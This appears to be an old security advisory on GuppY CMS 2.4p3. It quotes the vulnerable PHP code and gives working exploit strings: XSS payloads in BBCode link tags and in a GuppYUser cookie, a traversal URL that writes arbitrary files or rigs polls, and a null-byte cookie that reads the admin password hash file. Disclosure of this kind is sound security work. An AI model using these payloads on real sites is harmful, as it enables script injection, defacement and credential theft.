Informations :
°°°°°°°°°°°°°
Language : PHP
Bugged Version : 2.4p3 (and less ?)
Patched version : 2.4p4
Website : http://www.freeguppy.org
Problems :
- Permanent XSS
- Files Reading
- Files Writing

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°

postguest.php :

--------------------------------------------------------------------------------------------------------------------
[...]
    $ptxt = eregi_replace("\\[l\\]www.([^\\[]*)\\[/l\\]", "<a 
href=\"http://www.\\1\" target=_blank>\\1</a>",$ptxt);
    $ptxt = eregi_replace("\\[l\\]www.([^\\[]*)\\[/L\\]", "<a 
href=\"http://www.\\1\" target=_blank>\\1</a>",$ptxt);
    $ptxt = eregi_replace("\\[L\\]www.([^\\[]*)\\[/l\\]", "<a 
href=\"http://www.\\1\" target=_blank>\\1</a>",$ptxt);
    $ptxt = eregi_replace("\\[L\\]www.([^\\[]*)\\[/L\\]", "<a 
href=\"http://www.\\1\" target=_blank>\\1</a>",$ptxt);
    $ptxt = eregi_replace("\\[l\\]([^\\[]*)\\[/l\\]","<a href=\"\\1\" 
target=_blank>\\1</a>",$ptxt);
    $ptxt = eregi_replace("\\[l\\]([^\\[]*)\\[/L\\]","<a href=\"\\1\" 
target=_blank>\\1</a>",$ptxt);
    $ptxt = eregi_replace("\\[L\\]([^\\[]*)\\[/l\\]","<a href=\"\\1\" 
target=_blank>\\1</a>",$ptxt);
    $ptxt = eregi_replace("\\[L\\]([^\\[]*)\\[/L\\]","<a href=\"\\1\" 
target=_blank>\\1</a>",$ptxt);
    $ptxt = eregi_replace("\\[l=([^\\[]*)\\]([^\\[]*)\\[/l\\]","<a 
href=\"\\1\" target=_blank>\\2</a>",$ptxt);
    $ptxt = eregi_replace("\\[l=([^\\[]*)\\]([^\\[]*)\\[/L\\]","<a 
href=\"\\1\" target=_blank>\\2</a>",$ptxt);
    $ptxt = eregi_replace("\\[L=([^\\[]*)\\]([^\\[]*)\\[/l\\]","<a 
href=\"\\1\" target=_blank>\\2</a>",$ptxt);
    $ptxt = eregi_replace("\\[L=([^\\[]*)\\]([^\\[]*)\\[/L\\]","<a 
href=\"\\1\" target=_blank>\\2</a>",$ptxt);
[...]
--------------------------------------------------------------------------------------------------------------------


inc/includes.inc, inc/includes_IIS.inc :

-------------------------------------------------------------------------------
[...]
$usercookie = "GuppYUser";
$userprefs = array();
if (!empty($HTTP_COOKIE_VARS[$usercookie])) {
  $userprefs = explode("||",$HTTP_COOKIE_VARS[$usercookie]);
  $userprefs[0] = strip_tags($userprefs[0]);
  $userprefs[1] = strip_tags($userprefs[1]);
  $userprefs[2] = strip_tags($userprefs[2]);
  $userprefs[3] = strip_tags($userprefs[3]);
  $userprefs[4] = strip_tags($userprefs[4]);
  $userprefs[5] = strip_tags($userprefs[5]);
  $userprefs[6] = strip_tags($userprefs[6],"<br>");
  if (($userprefs[0] == $lang[0] || $userprefs[0] == $lang[1]) & 
empty($lng)) {
    $lng = $userprefs[0];
  }
}
[...]
-------------------------------------------------------------------------------


inc/functions.php :

--------------------------------------------------------------
[...]
function ReadDBFields($fic) {
  global $connector;
  $DataDB = Array();
  if (FileDBExist($fic)) {
    $DataDB = file($fic);
    for ($i = 0; $i < count($DataDB); $i++) {
      $Fields[$i] = explode($connector,trim($DataDB[$i]));
    }
  }
  return $Fields;
}

function WriteDBFields($fic,$Fields) {
  global $connector;
  $fhandle = fopen($fic, "w");
  $DataDB = "";
  for ($i = 0; $i < count($Fields); $i++) {
    for ($j = 0 ; $j < (count($Fields[$i])-1); $j++) {
      $DataDB .= trim($Fields[$i][$j]).$connector;
    }
    $DataDB .= trim($Fields[$i][count($Fields[$i])-1])."\n";
  }
  fputs($fhandle, $DataDB);
  fclose($fhandle);
}
[...]
--------------------------------------------------------------


tinymsg.php :

-----------------------------------------------------------------------------------------------------------------------------
[...]
elseif ($action == 2) {
[...]
    $dbmsg[0][0] = 0;
    $dbmsg[1][0] = $from;
    $dbmsg[1][1] = GetCurrentDateTime();
    $dbmsg[1][2] = PutBR(RemoveConnector(stripslashes($msg)));
    WriteDBFields($userep.$to.$dbext,$dbmsg);
  }
[...]
elseif ($action == 3) {
?>
[...]
  $dbmsg = Array();
  if (FileDBExist($userep.$userprefs[1].$dbext)) {
    $dbmsg = ReadDBFields($userep.$userprefs[1].$dbext);
    for ($i = 1; $i < count($dbmsg); $i++) {

?>
<p><? echo $web6; ?> <b><? echo $dbmsg[$i][0]; ?></b> <? echo $web7." 
".FormatDate($dbmsg[$i][1]); ?></p>
<p><? echo $dbmsg[$i][2]; ?></p>
<?
      if ($dbmsg[$i][0] != $web214) {
?>
<p align="center">[ <A href ="javascript:PopupWindow('tinymsg.php?lng=<? 
echo $lng; ?>&action=1&to=<? echo $dbmsg[$i][0]; ?>&from=<? echo 
$userprefs[1]; ?>','tinywrite',330,245,'no','no')"><? echo $web140; ?></A> 
]</p>
<?
      }
?>
<hr>
[...]
-----------------------------------------------------------------------------------------------------------------------------


Exploits :
°°°°°°°°

- [l]" style="background:url('javascript:[SCRIPT]');visibility:hidden;[/l]

- [l][l] style=list-style:url(javascript:[SCRIPT]) truc=[/l][/l]


- With a cookie named "GuppYUser" and with the value :
fr||[NICK]||[MAIL]||LR||||on||<br 
style="background:url('javascript:[SCRIPT]')">, if you send a message 
(forum, guestbook,...) the javascript is executed.


- http://[target]/tinymsg.php?action=2&from=Youpi!||Great 
!||rose||10000&msg=1&to=../poll
will add a possibility to the current poll : "Youpi!" with the pink color 
("rose" in french) and a score of 10000.

- 
http://[target]//tinymsg.php?action=2&to=../../tadaam.html%00&from=youpi1&msg=youpi2 
will write into http://[target]/tadaam.html the line :
0\nyoupi1||[DATE+HEURE]||youpi2

- The cookie named "GuppYUser" and with the value :
fr||../../admin/mdp.php%00||[MAIL]||LR||||on||1
sent to the page : http://[target]/tinymsg.php?action=3  will show the 
source of the file http://[target]/admin/mdp.php (containing the md5-crypted 
admin password).



Patch/More Details :
°°°°°°°°°°°°°°°°°°
http://www.phpsecure.info




frog-m@n

_________________________________________________________________
Hotmail: votre e-mail gratuit ! http://www.fr.msn.be/hotmail